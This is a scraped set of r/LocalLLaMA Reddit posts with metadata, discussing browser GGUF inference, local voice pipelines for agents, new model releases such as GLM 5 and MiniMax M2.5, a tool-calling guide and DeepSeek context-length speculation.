* We built a new lightweight **WASM/WebGPU engine** that runs **GGUF models in the browser.**
* From now on, you don't need any additional software to run models, just a modern browser (we already have full support for Chrome, Safari, and Edge).
* MDST right now runs **Qwen 3, Ministral 3, LFM 2.5, and Gemma 3 in any GGUF quantization**.
* We are working on mobile inference, KV caching, and stable support for larger models (like GLM 4.7 Flash, for example) and a more effective WASM64 version.
For full details on our GGUF research and future plans, current public WebGPU leaderboard, and early access, check out: [https://mdst.app/blog/mdst\_engine\_run\_gguf\_models\_in\_your\_browser](https://mdst.app/blog/mdst_engine_run_gguf_models_in_your_browser)
Thanks so much, guys, for the amazing community, we’d love to get any kind of feedback on what models or features we should add next! | 2026-02-11T12:38:02 | https://www.reddit.com/gallery/1r1w9fs | vmirnv | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r1w9fs | false | null | t3_1r1w9fs | /r/LocalLLaMA/comments/1r1w9fs/mdst_engine_run_gguf_models_in_your_browser_with/ | false | false | 23 | null | |
Help finding a good model for my use case. | 1 | [removed] | 2026-02-11T12:02:45 | https://www.reddit.com/r/LocalLLaMA/comments/1r1vjqg/help_finding_a_good_model_for_my_use_case/ | TowerChance8849 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1vjqg | false | null | t3_1r1vjqg | /r/LocalLLaMA/comments/1r1vjqg/help_finding_a_good_model_for_my_use_case/ | false | false | self | 1 | null |
Local voice control for my AI agent - Parakeet STT + Kokoro TTS on Apple Silicon | 9 | I've been running an AI agent (OpenClaw + Claude) on a Mac Mini M4 for 2 weeks. The cloud LLM part works great but I wanted the voice interaction to be fully local and fast.
Ended up with Parakeet for STT and Kokoro for TTS, both running on Apple Silicon. Parakeet transcribes in about 240ms, Kokoro responds near instantly. No cloud dependency for the voice layer.
The difference between typing commands and just talking is massive. I went from sitting at my desk all day to working from anywhere. Balcony, walking the dog, couch. I just talk and the agent handles game deployments, server monitoring, social media, the usual stuff.
One funny thing: the STT sometimes transcribes my Greek accent saying the agent's name wrong. He started correcting me like Hermione in Harry Potter: "It's Niko, not Nico!"
Also built a 3D avatar (Mimora) as a browser extension that shows facial expressions when the agent responds. Listening, thinking, happy. Makes the whole thing feel way more natural.
Anyone else running local voice pipelines with their agents? Curious what STT/TTS combos people are using. Full setup documented at [https://myclaw.tech](https://myclaw.tech)
Thread with screenshots: [https://x.com/PlayingInCanvas/status/2021529883919405297](https://x.com/PlayingInCanvas/status/2021529883919405297) | 2026-02-11T11:56:26 | https://v.redd.it/q3zmrtl5uuig1 | leonidas_elanra | v.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1vf4e | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/q3zmrtl5uuig1/DASHPlaylist.mpd?a=1773403002%2CYTkwMmFiY2E5ZTdjYTgwNTZjOGY4MDhhOGQwMjJlOWZmY2Y4NTVkM2Y5ODAwNTlkNmNhZjgyYjk3MDNhMjBhNQ%3D%3D&v=1&f=sd', 'duration': 27, 'fallback_url': 'https://v.redd.it/q3zmrtl5uuig1/CMAF_1080.mp4?source=fallback', 'has_audio': True, 'height': 1080, 'hls_url': 'https://v.redd.it/q3zmrtl5uuig1/HLSPlaylist.m3u8?a=1773403002%2CYjJkZjM5YWE4YmZmMjBjZTU5MDk3NmE3ZDAxNzgzYjgxM2VmYzJlZTczODllNmFkNjI4YzA4Nzk1NTMxYzM3Nw%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/q3zmrtl5uuig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1920}} | t3_1r1vf4e | /r/LocalLLaMA/comments/1r1vf4e/local_voice_control_for_my_ai_agent_parakeet_stt/ | false | false | 9 | {'enabled': False, 'images': [{'id': 'emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB', 'resolutions': [{'height': 60, 'url': 'https://external-preview.redd.it/emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB.png?width=108&crop=smart&format=pjpg&auto=webp&s=dc99ca4e4e3d9faf9fa5d2c370f04cf001913a14', 'width': 108}, {'height': 121, 'url': 'https://external-preview.redd.it/emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB.png?width=216&crop=smart&format=pjpg&auto=webp&s=d2427664af209e60d618a446b1b44136fdd7ae9d', 'width': 216}, {'height': 180, 'url': 'https://external-preview.redd.it/emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB.png?width=320&crop=smart&format=pjpg&auto=webp&s=ef2174fed4dc82994f1a66a2e7d273b81cdbb138', 'width': 320}, {'height': 360, 'url': 'https://external-preview.redd.it/emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB.png?width=640&crop=smart&format=pjpg&auto=webp&s=a4b24a6143b0ade0a8f56793e6ab7ba6f8cd4587', 'width': 640}, {'height': 540, 'url': 'https://external-preview.redd.it/emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB.png?width=960&crop=smart&format=pjpg&auto=webp&s=ae64cb450679b47846892bff4c2986008d8643fb', 'width': 960}, {'height': 607, 'url': 'https://external-preview.redd.it/emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB.png?width=1080&crop=smart&format=pjpg&auto=webp&s=72f273f37db68ba2e611a4329ed62c7594efde3d', 'width': 1080}], 'source': {'height': 1080, 'url': 'https://external-preview.redd.it/emViZjMzbTV1dWlnMfQvy7W0WCM9-b_6qSDU25Dm7JShPRamXXjE1GlV7dWB.png?format=pjpg&auto=webp&s=406e40351e5d569152eeb5211332c5564a25043c', 'width': 1920}, 'variants': {}}]} | |
MiniMax M2.5 is currently undergoing internal testing and is available to a small number of users | 32 | [https://x.com/rudrank/status/2021534943932031226?s=20](https://x.com/rudrank/status/2021534943932031226?s=20)
https://preview.redd.it/rzn30tyytuig1.png?width=626&format=png&auto=webp&s=361c1704ab37823746ab84fe45b4dcd3d378685a
https://preview.redd.it/1vqjp3n1uuig1.png?width=680&format=png&auto=webp&s=4c9967df4c6af84af29af6ae5272b243a6ad1693
| 2026-02-11T11:55:31 | https://www.reddit.com/r/LocalLLaMA/comments/1r1vegx/minimax_m25_is_currently_undergoing_internal/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1vegx | true | null | t3_1r1vegx | /r/LocalLLaMA/comments/1r1vegx/minimax_m25_is_currently_undergoing_internal/ | false | false | 32 | null | |
Zhipu is rolling out GLM 5 now! | 50 | Sauce : [https://www.businesstimes.com.sg/companies-markets/telcos-media-tech/chinas-zhipu-unveils-new-ai-model-jolting-race-deepseek](https://www.businesstimes.com.sg/companies-markets/telcos-media-tech/chinas-zhipu-unveils-new-ai-model-jolting-race-deepseek) | 2026-02-11T11:51:25 | https://www.reddit.com/r/LocalLLaMA/comments/1r1vbpi/zhipu_is_rolling_out_glm_5_now/ | NegotiationOk888 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1vbpi | false | null | t3_1r1vbpi | /r/LocalLLaMA/comments/1r1vbpi/zhipu_is_rolling_out_glm_5_now/ | false | false | self | 50 | {'enabled': False, 'images': [{'id': 'inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0', 'resolutions': [{'height': 72, 'url': 'https://external-preview.redd.it/inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0.jpeg?width=108&crop=smart&auto=webp&s=ca60ecda112c899d47a2bc0e0be24772e91cddf7', 'width': 108}, {'height': 144, 'url': 'https://external-preview.redd.it/inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0.jpeg?width=216&crop=smart&auto=webp&s=1850b0da690751f6ab794c0da57e897981ccade7', 'width': 216}, {'height': 213, 'url': 'https://external-preview.redd.it/inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0.jpeg?width=320&crop=smart&auto=webp&s=8cb00e1c87bcfc891756c1bc9469c58586aeb76e', 'width': 320}, {'height': 426, 'url': 'https://external-preview.redd.it/inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0.jpeg?width=640&crop=smart&auto=webp&s=d93afe94a6fbfc4538b1cb0df149b05473109af6', 'width': 640}, {'height': 640, 'url': 'https://external-preview.redd.it/inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0.jpeg?width=960&crop=smart&auto=webp&s=de09955a55baee82b0bb127f1c4463d17fe87e40', 'width': 960}, {'height': 720, 'url': 'https://external-preview.redd.it/inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0.jpeg?width=1080&crop=smart&auto=webp&s=9c7273200a039e76200ef9b1794b05beef5a2233', 'width': 1080}], 'source': {'height': 1280, 'url': 'https://external-preview.redd.it/inePWSsWi0BLDkbtmphHk82b_fTRfJgd8DDkSjC3TC0.jpeg?auto=webp&s=2c64240961eb9d6514e6b40b2dd3aa7407401b51', 'width': 1920}, 'variants': {}}]} |
Qwen3-VL - Bounding Box Coordinate | 1 | Hey everyone,
I’ve been exploring open source models that can take an image and output bounding boxes for a specific object. I tried **Qwen-3-VL**, but the results weren’t very precise. Models like **Gemini 3** seem much better in terms of accuracy.
Does anyone know of open source alternatives or techniques that can improve bounding box precision? I’m looking for something reliable for real-world images.
Any suggestions or experiences would be really appreciated! | 2026-02-11T11:32:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r1uz9i/qwen3vl_bounding_box_coordinate/ | Impress_Soft | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1uz9i | false | null | t3_1r1uz9i | /r/LocalLLaMA/comments/1r1uz9i/qwen3vl_bounding_box_coordinate/ | false | false | self | 1 | null |
We built a simple coordination loop for agents (match → exchange → score → re-match) — curious where you’d use it | 0 | I’ve been working on a small piece of infrastructure for **agent coordination**, and I’d love to share it with people actually running agents.
The core idea is simple:
**match → exchange → score → re-match**
Agents exchange short messages and attach a score to each interaction.
Across repeated rounds, the system learns which interactions create value and makes similar ones more likely to happen again.
A few important clarifications:
* It’s **not a chat app** and doesn’t rely on transcripts
* Nodes keep their **own memory and data locally**
* The main learning signal is the **score attached to exchanges**
We’re early, but it’s already usable for experimentation.
I’m especially curious:
* **Where in your current agent setup would coordination like this actually help?**
* **What kind of agent workflow would you try this with first?**
Short guide here if you want to see how it works:
[https://hashgrid.ai/](https://hashgrid.ai/)
Happy to answer anything — and very open to blunt feedback from people building in this space. | 2026-02-11T11:25:14 | https://www.reddit.com/r/LocalLLaMA/comments/1r1uue0/we_built_a_simple_coordination_loop_for_agents/ | Alex342RO | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1uue0 | false | null | t3_1r1uue0 | /r/LocalLLaMA/comments/1r1uue0/we_built_a_simple_coordination_loop_for_agents/ | false | false | self | 0 | null |
Tool Calling Guide for Local LLMs (Run Real Actions, Not Just Text!) | 3 | If you're running local LLMs with **llama.cpp** and want them to actually *do things* — like run Python, execute terminal commands, calculate values, or call APIs — this guide is 🔥
I just went through this incredibly detailed tutorial on **Tool Calling for Local LLMs by Unsloth AI**, and it's honestly one of the cleanest implementations I’ve seen.
Full Guide: [https://unsloth.ai/docs/basics/tool-calling-guide-for-local-llms](https://unsloth.ai/docs/basics/tool-calling-guide-for-local-llms) | 2026-02-11T11:06:22 | https://www.reddit.com/r/LocalLLaMA/comments/1r1uib3/tool_calling_guide_for_local_llms_run_real/ | techlatest_net | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1uib3 | false | null | t3_1r1uib3 | /r/LocalLLaMA/comments/1r1uib3/tool_calling_guide_for_local_llms_run_real/ | false | false | self | 3 | {'enabled': False, 'images': [{'id': 'ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM', 'resolutions': [{'height': 53, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=108&crop=smart&auto=webp&s=6fa9ec0bda4ae81d05efe9ff0a296be82987e912', 'width': 108}, {'height': 106, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=216&crop=smart&auto=webp&s=18872cd0af37e87d93cf5b6c098630c44f40a162', 'width': 216}, {'height': 157, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=320&crop=smart&auto=webp&s=e8392e0cb89db800c200421873b07e92f34150fe', 'width': 320}, {'height': 314, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=640&crop=smart&auto=webp&s=5f6fc5d8f727ab6f86a8ca5f94a5091bbe81d025', 'width': 640}, {'height': 472, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=960&crop=smart&auto=webp&s=26fa346a0f27ac195ecf2f29e1d997a534a3b283', 'width': 960}, {'height': 531, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?width=1080&crop=smart&auto=webp&s=4e4e7bc3c126d7465ae2f4d8fab93d8c6edd76c4', 'width': 1080}], 'source': {'height': 590, 'url': 'https://external-preview.redd.it/ksRJC2bKGwjrMfOqsioi-B4oIm5QWQUM7Vf03KwieGM.jpeg?auto=webp&s=df3ed66f8b8e54b17c699d9c4e81b03ddeb78c58', 'width': 1200}, 'variants': {}}]} |
Grok-3 joins upcoming models list | 137 | [Tweet link](https://x.com/elonmusk/status/2020878250516341110)
First question is when? | 2026-02-11T10:41:33 | pmttyji | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1u2ne | false | null | t3_1r1u2ne | /r/LocalLLaMA/comments/1r1u2ne/grok3_joins_upcoming_models_list/ | false | false | 137 | {'enabled': True, 'images': [{'id': 'ueoiz6yrfuig1', 'resolutions': [{'height': 36, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?width=108&crop=smart&auto=webp&s=b97f845e0cf28ddb283905ea5569642e659f3acf', 'width': 108}, {'height': 72, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?width=216&crop=smart&auto=webp&s=e7e081de95d3300fb412e982ce7e9bd6b71b19cc', 'width': 216}, {'height': 107, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?width=320&crop=smart&auto=webp&s=bc9154b12fb8ee19cbdde7d47a510f5ad934b95f', 'width': 320}], 'source': {'height': 204, 'url': 'https://preview.redd.it/ueoiz6yrfuig1.png?auto=webp&s=1b5ffaf37197594f464c8fe3e061a8994a951c50', 'width': 609}, 'variants': {}}]} | ||
activefence quietly rebranded to alice, anyone notice? | 1 | [removed] | 2026-02-11T10:40:16 | [deleted] | 1970-01-01T00:00:00 | 0 | {} | 1r1u1ud | false | null | t3_1r1u1ud | /r/LocalLLaMA/comments/1r1u1ud/activefence_quietly_rebranded_to_alice_anyone/ | false | false | default | 1 | null | ||
DeepSeek new model maybe is 3.2M context length not only 1M | 7 | Source: [https://linux.do/t/topic/1605482](https://linux.do/t/topic/1605482) (Chinese text warning)
https://preview.redd.it/qm1tcv1vfuig1.png?width=432&format=png&auto=webp&s=07a3acfee34af993e4e75d9c8b98ef661f27de0a
https://preview.redd.it/lsovuy7wfuig1.png?width=978&format=png&auto=webp&s=04094fc5a5714f26fe67959dc1c28c18cd9782be
Someone tested it with a TRPG log, and it reported reading 92%. Since the log contains 3,474,617 tokens when encoded with the DeepSeek V3 tokenizer, 92% comes out to about 3,196,647. I suspect the actual usable context window is 3.2M tokens. Additionally, the summarized chronicle was highly accurate; it covered almost everything except the very end without any omissions, and its prediction for the ending was also spot on."
| 2026-02-11T10:36:49 | https://www.reddit.com/r/LocalLLaMA/comments/1r1tzub/deepseek_new_model_maybe_is_32m_context_length/ | External_Mood4719 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1tzub | false | null | t3_1r1tzub | /r/LocalLLaMA/comments/1r1tzub/deepseek_new_model_maybe_is_32m_context_length/ | false | false | 7 | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.